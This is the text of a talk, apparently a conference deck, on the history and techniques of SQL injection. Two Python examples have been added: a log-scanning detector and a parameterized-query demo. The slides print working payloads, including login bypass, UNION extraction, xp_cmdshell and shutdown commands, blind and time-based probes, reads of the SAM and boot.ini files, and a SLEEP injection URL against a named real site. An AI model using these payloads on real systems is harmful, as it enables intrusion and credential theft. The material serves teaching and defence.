
Feliz 15 aniversario, SQL Injection!

What this talk is not about

This is about Love

Los Amantes del Círculo Polar

25 Dec 1998: The birth

http://www.phrack.org/issues.html?id=8&issue=54

Beginning

Tautology

User: admin
Pass: ' or '1'='1

q = "Select uid from users where uid='" + $user + "' and pass='" + $pass + "';"

q = "Select uid from users where uid='admin' and pass='' or '1'='1';"

14 Aug 2007: IBM

http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability

Place

Inband
-1 union select 1,1,1,1,username,1,a,1 from users --

2001 - Out-of-band

http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc

Yesterday

[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.

q = "Select title from noticias where ud=" + $id + ";"

Id=1 or 1=(select top 1 username from sysusers) --

Jul 2007: Microsoft Partner Programme

2002 Advanced SQL Injection Techniques

https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf

Advanced Tricks
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--

Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ': admin/r00tr0x! guest/guest chris/password fred/sesame' to a column of data type int.

exec master..xp_cmdshell 'dir'

Id= 1; shutdown --

27 Mar - 2007

Outer Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files

Log Files

Eyes of Fear

2002 - Blind
http://server/miphp.php?id=1 and 1=1
True
http://server/miphp.php?id=1 and 1=0
False

2010 US Army

Time

2002 Time Based Blind SQL Injection

http://www.northernfortress.net/more_advanced_sql_injection.pdf

(more) Advanced Tricks

ping -n 10 127.0.0.1

if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'

2004 Time-Based in Other Databases

SQL Server
1) ; if ... waitfor delay
2) ; exec xp_cmdshell 'ping -n ...'
Oracle
1) dbms_lock.sleep()
PL/SQL Injection
MySQL
1) and sleep()  (5.0 or higher)
2) benchmark() function
Postgres
1) pg_sleep()
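The boolean and time-based probes in the slides above leave recognisable traces in ordinary web-server access logs. As an added example that is not part of the deck, here is a small Python detector that decodes each request's query string, strips the /**/ comment smuggling shown later in the deck, and flags the technique families the deck covers (time delays, 1=1 / 1=0 pairs, UNION, per-character ASCII probing). The log lines and the family names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2014:10:00:01 +0000] "GET /miphp.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2014:10:00:02 +0000] "GET /miphp.php?id=1%20and%201=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2014:10:00:03 +0000] "GET /miphp.php?id=1%20and%201=0 HTTP/1.1" 200 98
10.0.0.7 - - [01/Jan/2014:10:00:04 +0000] "GET /index.php?p=2&scId=113;%20select%20SLEEP(5)-- HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2014:10:00:05 +0000] "GET /news.asp?id=1;%20waitfor%20delay%20'0:0:5'-- HTTP/1.1" 500 240
10.0.0.9 - - [01/Jan/2014:10:00:06 +0000] "GET /item.php?id=1/**/aNd/**/1=ascii(substr(user(),1,1)) HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2014:10:00:07 +0000] "GET /item.php?id=-1%20union%20select%201,username,1%20from%20users-- HTTP/1.1" 200 800
10.0.0.2 - - [01/Jan/2014:10:00:08 +0000] "GET /search.php?q=blind%20date HTTP/1.1" 200 300
"""

# client ip ... "METHOD target HTTP/..."
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# One regex per technique family from the deck (family names are ours).
SIGNATURES = {
    "time-based": re.compile(
        r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(|pg_sleep\s*\(|dbms_lock\.sleep"),
    "boolean-blind": re.compile(r"\b(?:and|or)\s+1\s*=\s*[01]\b|'1'\s*=\s*'1'"),
    "union-inband": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "char-probe": re.compile(r"\bascii\s*\(\s*substr(?:ing)?\s*\("),
}


def normalize(raw: str) -> str:
    """Undo the evasions the deck shows before matching: URL decoding (twice, to
    catch double encoding), NUL bytes, /**/ comment smuggling, mixed case."""
    s = raw
    for _ in range(2):
        s = unquote_plus(s)
    s = s.replace("\x00", "")
    s = re.sub(r"/\*.*?\*/", " ", s)  # '/**/aNd/**/' -> ' aNd '
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def scan_log(log_text: str) -> list:
    """Return one finding per (request, family) hit: ip, family, decoded query."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or "?" not in m.group(2):
            continue
        ip, target = m.groups()
        query = normalize(target.split("?", 1)[1])
        for family, pattern in SIGNATURES.items():
            if pattern.search(query):
                findings.append({"ip": ip, "family": family, "query": query})
    return findings


def boolean_pairs(findings: list) -> set:
    """A client that sent both a 1=1 and a 1=0 variant is running the
    true/false oracle from the 'Blind' slide; report those clients."""
    seen = {}
    for f in findings:
        if f["family"] != "boolean-blind":
            continue
        flags = seen.setdefault(f["ip"], set())
        if re.search(r"1\s*=\s*1\b", f["query"]):
            flags.add("true")
        if re.search(r"1\s*=\s*0\b", f["query"]):
            flags.add("false")
    return {ip for ip, flags in seen.items() if flags == {"true", "false"}}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']:10} {h['family']:14} {h['query']}")
    print("boolean true/false probing from:", boolean_pairs(hits))
```

The normalization step matters more than the signature list: without decoding and comment stripping the `/**/aNd/**/` request would match nothing. In production this would feed a SIEM rule keyed on client and path rather than print to stdout, and response sizes (the 512 vs 98 bytes in the 1=1 / 1=0 pair) are a second signal worth correlating.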

Jun 2007 : Solar Empire Exploit

http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html

Apr 2013: Yahoo!

http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--

http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html

2007 Time-Based SQL Injection using Heavy Queries

https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf

Time-Based Using Heavy Queries in MS Access

(Screenshots: True response / False response)

Deep Blind SQL Injection

http://labs.portcullis.co.uk/application/deep-blind-sql-injection

Ace

Serialized SQL Injection

union select '1','2','3',(select * from sysusers for xml raw, binary base64)

pass=

Inverted Queries - Lefties


q = "Select uid from users where '" + $user + "'=uid and '" + $pass + "'=pass;"

Arithmetic Blind SQL Injection

Id=A+(1/(ASCII(B)-C))

Id=A+ASCII(B)-C

Id=A+((C/ASCII(B))*(K))

RFD (Remote File Downloading) SQL Server 2K

And 200>ASCII (SUBSTRING(SELECT * FROM


OPENROWSET('MSDASQL', 'Driver = {Microsoft Text Driver (*.txt;
*.csv)};DefaultDir=C:\;','select top 1 * from c:\dir\target.txt),1,1))
; Create Table TempTable as (row varchar(8000)) -; Bulk Insert TempTable From 'c:\file.ext' With (FIELDTERMINATOR = '\n',
ROWTERMINATOR = '\n) -; alter table TempTable add num int IDENTITY(1,1) NOT NULL
and (select COUNT(row) from TempTable)
and (select top 1 len(row) from TempTable where num = rownum)
and (select top 1 ASCII(SUBSTRING(row,1,1)) from TempTable where num
= 1)
; Drop Table TempTable--

RFD (Remote File Downloading) SQL Server 2K5++

AND 256 > ASCII(SUBSTRING ((SELECT * FROM OPENROWSET(BULK


'c:\windows\repair\sam', SINGLE_BLOB) As Data), 1, 1))

RFD (Remote File Downloading) MySQL

LoadFile
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)

Load Data infile


; Create table C8DFC643 (datos varchar(4000))
; Load data infile 'c:\\boot.ini' into table C8DFC643
; alter table C8DFC643 add column num integer auto_increment
unique key
and (select count(num) from C8DFC643)
and (select length(datos) from C8DFC643 where num = 1)
and (select ASCII(substring(datos,5,1)) from C8DFC643 where num = 1)
; Drop table C8DFC643

RFD (Remote File Downloading) Oracle


External Tables & Plain Text Files
; execute immediate 'Create Directory A4A9308C As ''c:\'' '; end; - ; execute immediate 'Create table A737D141 ( datos varchar2(4000) ) organization
external (TYPE ORACLE_LOADER default directory A4A9308C access parameters (
records delimited by newline ) location (''boot.ini''))'; end;--

DBMS_LOB
; execute immediate
DECLARE l_bfile BFILE;
l_blob BLOB;
BEGIN INSERT INTO A737D141 (datos) VALUES (EMPTY_BLOB()) RETURN datos INTO
l_blob;
l_bfile := BFILENAME(''A4A9308C'', ''Picture.bmp'');
DBMS_LOB.fileopen(l_bfile, Dbms_Lob.File_Readonly);
DBMS_LOB.loadfromfile(l_blob,l_bfile,DBMS_LOB.getlength(l_bfile));
DBMS_LOB.fileclose(l_bfile);
COMMIT;
EXCEPTION
WHEN OTHERS THEN ROLLBACK;
END;
; end; --

CSRF+SQLi

Smuggling

/**/aNd/**/1=aSC(substr(user(),1,1))%00

Braveness

Connection String Parameter Pollution

http://www.blackhat.com/presentations/bh-dc-10/Alonso_Chema/Blackhat-DC-2010-Alonso-Connection-StringParameter-Pollution-wp.pdf

XPath Injection

http://2stop.me/S%C3%A9curit%C3%A9%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf

LDAP Injection

http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf

OWASP TOP 10 - 2013

Forbidden

q = "Select uid from users where uid='" + $user + "' and pass='" + $pass + "';"

Use Brain not tech


PHP Magic Quotes?  ->  id=1 and 1=1
Python?  ->  Not invulnerable
.NET?  ->  Not invulnerable
LINQ?  ->  Not invulnerable
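To make the "Forbidden" query and the platform list above concrete, here is an added Python example (not from the deck, and not any project's code) using the standard sqlite3 module: the concatenated login query from the deck beside its parameterized form, plus the numeric case that shows why quote escaping of the magic-quotes kind is not a fix. Table names, rows and credentials are constructed for the demo.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory demo database (sample rows, not from any real system)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, pass TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'chris', 'password');
        CREATE TABLE noticias (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO noticias VALUES (1, 'public story'), (2, 'draft story');
    """)
    return conn


def login_vulnerable(conn, user: str, password: str):
    # Same construction as the deck's q=... line: values pasted into SQL text,
    # so a password of  ' or '1'='1  rewrites the WHERE clause.
    q = ("SELECT uid FROM users WHERE username='" + user
         + "' AND pass='" + password + "'")
    row = conn.execute(q).fetchone()
    return row[0] if row else None


def login_safe(conn, user: str, password: str):
    # Parameterized: the driver sends values separately from query structure,
    # so a quote in the input is only ever data.
    q = "SELECT uid FROM users WHERE username=? AND pass=?"
    row = conn.execute(q, (user, password)).fetchone()
    return row[0] if row else None


def title_escaped_only(conn, id_str: str) -> list:
    # Quote escaping (what PHP magic quotes did) is useless in a numeric
    # context: "1 or 1=1" contains no quote, so nothing is escaped.
    escaped = id_str.replace("'", "\\'")
    rows = conn.execute("SELECT title FROM noticias WHERE id=" + escaped).fetchall()
    return [r[0] for r in rows]


def title_safe(conn, id_str: str) -> list:
    # Validate the type first, then bind the value; reject anything else.
    try:
        id_num = int(id_str)
    except ValueError:
        return []
    rows = conn.execute("SELECT title FROM noticias WHERE id=?", (id_num,)).fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable login:", login_vulnerable(conn, "admin", "' or '1'='1"))
    print("safe login:      ", login_safe(conn, "admin", "' or '1'='1"))
    print("escaped numeric: ", title_escaped_only(conn, "1 or 1=1"))
    print("safe numeric:    ", title_safe(conn, "1 or 1=1"))
```

The point the deck makes about PHP, Python, .NET and LINQ holds here too: sqlite3 does not protect the concatenated version, only the code that keeps data out of the query text does. The same `?` placeholders (or the DB-API's `%s` style in other drivers) apply to every language on that slide.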

Fixing code injections isn't the worst job

More

@chemaalonso
http://www.elladodelmal.com
http://0xword.com/libros/25-libro-hacking-aplicaciones-web-sql-injection.html